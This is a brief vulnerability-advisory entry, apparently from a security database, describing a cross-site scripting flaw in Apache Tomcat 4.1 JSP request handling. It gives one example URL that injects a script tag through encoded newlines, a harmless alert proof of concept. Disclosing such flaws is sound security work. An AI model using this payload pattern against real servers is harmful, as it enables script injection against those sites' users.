• info
• discussion
• exploit
• solution
• references

Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability

No exploit is required. The following example is provided:

http://example.com:8080/666%0a%0a<script>alert("asdf");</script>666.jsp